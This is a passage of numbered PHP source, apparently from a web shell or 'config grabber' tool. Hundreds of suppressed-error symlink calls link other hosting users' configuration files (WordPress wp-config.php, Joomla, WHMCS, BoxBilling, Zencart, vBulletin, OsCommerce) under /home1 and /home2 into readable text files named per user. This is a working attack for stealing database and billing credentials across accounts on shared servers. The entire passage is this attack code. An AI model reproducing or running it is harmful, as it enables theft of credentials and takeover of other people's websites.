  2347. @symlink('/home1/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  2348. @symlink('/home1/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  2349. @symlink('/home1/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  2350. @symlink('/home1/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  2351. @symlink('/home1/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  2352. @symlink('/home1/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  2353. @symlink('/home1/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  2354. @symlink('/home1/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  2355. @symlink('/home1/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  2356. @symlink('/home1/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  2357. @symlink('/home1/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  2358. @symlink('/home1/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  2359. @symlink('/home1/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  2360. @symlink('/home1/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  2361. @symlink('/home1/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  2362. @symlink('/home1/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  2363. @symlink('/home1/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  2364. @symlink('/home1/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  2365. @symlink('/home1/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  2366. @symlink('/home1/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  2367. @symlink('/home1/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  2368. @symlink('/home1/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  2369. @symlink('/home1/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  2370. @symlink('/home1/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  2371. @symlink('/home1/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  2372. @symlink('/home1/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  2373. @symlink('/home1/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  2374. @symlink('/home1/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  2375. @symlink('/home1/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  2376. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2377. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2378. @symlink('/home1/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  2379. @symlink('/home1/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  2380. @symlink('/home1/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  2381. @symlink('/home1/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  2382. @symlink('/home1/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  2383. @symlink('/home1/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  2384. @symlink('/home1/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  2385. @symlink('/home1/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  2386. @symlink('/home1/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  2387. @symlink('/home1/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  2388. @symlink('/home1/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  2389. @symlink('/home1/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  2390. @symlink('/home1/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  2391. @symlink('/home1/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  2392. @symlink('/home1/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  2393. @symlink('/home1/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  2394. @symlink('/home1/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  2395. @symlink('/home1/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  2396. @symlink('/home1/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  2397. @symlink('/home1/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  2398. @symlink('/home1/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  2399. @symlink('/home1/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  2400. @symlink('/home1/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  2401. @symlink('/home1/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  2402. @symlink('/home1/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  2403. @symlink('/home1/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  2404. @symlink('/home1/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  2405. @symlink('/home1/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  2406. @symlink('/home1/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  2407. @symlink('/home1/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  2408. @symlink('/home1/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  2409. @symlink('/home1/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  2410. @symlink('/home1/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  2411. @symlink('/home1/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  2412. @symlink('/home1/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  2413. @symlink('/home1/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  2414. @symlink('/home1/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  2415. @symlink('/home1/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  2416. @symlink('/home1/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  2417. @symlink('/home1/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  2418. @symlink('/home1/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  2419. @symlink('/home1/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  2420. @symlink('/home1/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2421. @symlink('/home1/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2422. @symlink('/home1/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2423. @symlink('/home1/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2424. @symlink('/home1/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2425. @symlink('/home1/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2426. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2427. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2428. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2429. @symlink('/home1/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2430. @symlink('/home1/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2431. @symlink('/home1/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2432. @symlink('/home1/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2433. @symlink('/home1/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2434. @symlink('/home1/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2435. @symlink('/home1/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2436. @symlink('/home1/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2437. @symlink('/home1/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2438. @symlink('/home1/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2439. @symlink('/home1/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2440. @symlink('/home1/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2441. @symlink('/home1/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2442. @symlink('/home1/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2443. @symlink('/home1/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2444. @symlink('/home1/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2445. @symlink('/home1/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2446. @symlink('/home1/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2447. @symlink('/home1/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2448. @symlink('/home1/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2449. @symlink('/home1/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2450. @symlink('/home1/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2451. @symlink('/home1/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2452. @symlink('/home1/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2453. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2454. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2455. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2456. @symlink('/home1/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2457. @symlink('/home1/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2458. @symlink('/home1/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2459. @symlink('/home1/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2460. @symlink('/home1/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2461. @symlink('/home1/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2462. @symlink('/home1/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2463. @symlink('/home1/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2464. @symlink('/home1/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2465. @symlink('/home1/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2466. @symlink('/home1/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2467. @symlink('/home1/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2468. @symlink('/home1/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2469. @symlink('/home1/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2470. @symlink('/home1/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2471. @symlink('/home1/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2472. @symlink('/home1/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2473. @symlink('/home1/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2474. @symlink('/home1/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2475. @symlink('/home1/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2476. @symlink('/home1/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2477. @symlink('/home1/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2478. @symlink('/home1/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2479. @symlink('/home1/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2480. @symlink('/home1/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2481. @symlink('/home1/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2482. @symlink('/home1/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2483. @symlink('/home1/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2484. @symlink('/home1/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2485. @symlink('/home1/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2486. @symlink('/home1/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2487. @symlink('/home1/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2488. @symlink('/home1/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2489. @symlink('/home1/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2490. @symlink('/home1/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2491. @symlink('/home1/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2492. @symlink('/home1/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2493. @symlink('/home1/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2494. @symlink('/home1/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2495. @symlink('/home1/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2496. @symlink('/home1/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2497. @symlink('/home1/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2498. @symlink('/home1/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2499. @symlink('/home1/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2500. @symlink('/home1/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2501. @symlink('/home1/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2502. @symlink('/home1/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2503. @symlink('/home1/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2504. @symlink('/home1/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2505. @symlink('/home1/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2506. @symlink('/home1/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2507.  
  2508. //Home2
  2509.  
  2510. @symlink('/home2/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  2511. @symlink('/home2/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  2512. @symlink('/home2/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  2513. @symlink('/home2/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  2514. @symlink('/home2/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  2515. @symlink('/home2/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  2516. @symlink('/home2/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  2517. @symlink('/home2/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  2518. @symlink('/home2/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  2519. @symlink('/home2/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  2520. @symlink('/home2/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  2521. @symlink('/home2/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  2522. @symlink('/home2/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  2523. @symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  2524. @symlink('/home2/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  2525. @symlink('/home2/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  2526. @symlink('/home2/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  2527. @symlink('/home2/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  2528. @symlink('/home2/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  2529. @symlink('/home2/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  2530. @symlink('/home2/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  2531. @symlink('/home2/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  2532. @symlink('/home2/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  2533. @symlink('/home2/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  2534. @symlink('/home2/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  2535. @symlink('/home2/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  2536. @symlink('/home2/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  2537. @symlink('/home2/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  2538. @symlink('/home2/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  2539. @symlink('/home2/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  2540. @symlink('/home2/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  2541. @symlink('/home2/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  2542. @symlink('/home2/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  2543. @symlink('/home2/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  2544. @symlink('/home2/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  2545. @symlink('/home2/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  2546. @symlink('/home2/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  2547. @symlink('/home2/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  2548. @symlink('/home2/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  2549. @symlink('/home2/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  2550. @symlink('/home2/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  2551. @symlink('/home2/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  2552. @symlink('/home2/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  2553. @symlink('/home2/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  2554. @symlink('/home2/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  2555. @symlink('/home2/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  2556. @symlink('/home2/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  2557. @symlink('/home2/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  2558. @symlink('/home2/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  2559. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2560. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2561. @symlink('/home2/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  2562. @symlink('/home2/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  2563. @symlink('/home2/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  2564. @symlink('/home2/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  2565. @symlink('/home2/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  2566. @symlink('/home2/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  2567. @symlink('/home2/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  2568. @symlink('/home2/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  2569. @symlink('/home2/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  2570. @symlink('/home2/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  2571. @symlink('/home2/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  2572. @symlink('/home2/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  2573. @symlink('/home2/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  2574. @symlink('/home2/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  2575. @symlink('/home2/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  2576. @symlink('/home2/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  2577. @symlink('/home2/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  2578. @symlink('/home2/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  2579. @symlink('/home2/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  2580. @symlink('/home2/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  2581. @symlink('/home2/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  2582. @symlink('/home2/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  2583. @symlink('/home2/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  2584. @symlink('/home2/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  2585. @symlink('/home2/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  2586. @symlink('/home2/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  2587. @symlink('/home2/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  2588. @symlink('/home2/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  2589. @symlink('/home2/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  2590. @symlink('/home2/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  2591. @symlink('/home2/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  2592. @symlink('/home2/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  2593. @symlink('/home2/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  2594. @symlink('/home2/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  2595. @symlink('/home2/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  2596. @symlink('/home2/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  2597. @symlink('/home2/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  2598. @symlink('/home2/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  2599. @symlink('/home2/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  2600. @symlink('/home2/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  2601. @symlink('/home2/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  2602. @symlink('/home2/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  2603. @symlink('/home2/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2604. @symlink('/home2/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2605. @symlink('/home2/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2606. @symlink('/home2/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2607. @symlink('/home2/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2608. @symlink('/home2/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2609. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2610. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2611. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2612. @symlink('/home2/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2613. @symlink('/home2/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2614. @symlink('/home2/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2615. @symlink('/home2/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2616. @symlink('/home2/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2617. @symlink('/home2/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2618. @symlink('/home2/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2619. @symlink('/home2/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2620. @symlink('/home2/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2621. @symlink('/home2/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2622. @symlink('/home2/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2623. @symlink('/home2/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2624. @symlink('/home2/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2625. @symlink('/home2/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2626. @symlink('/home2/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2627. @symlink('/home2/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2628. @symlink('/home2/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2629. @symlink('/home2/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2630. @symlink('/home2/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2631. @symlink('/home2/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2632. @symlink('/home2/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2633. @symlink('/home2/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2634. @symlink('/home2/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2635. @symlink('/home2/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2636. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2637. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2638. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2639. @symlink('/home2/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2640. @symlink('/home2/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2641. @symlink('/home2/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2642. @symlink('/home2/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2643. @symlink('/home2/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2644. @symlink('/home2/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2645. @symlink('/home2/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2646. @symlink('/home2/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2647. @symlink('/home2/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2648. @symlink('/home2/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2649. @symlink('/home2/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2650. @symlink('/home2/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2651. @symlink('/home2/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2652. @symlink('/home2/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
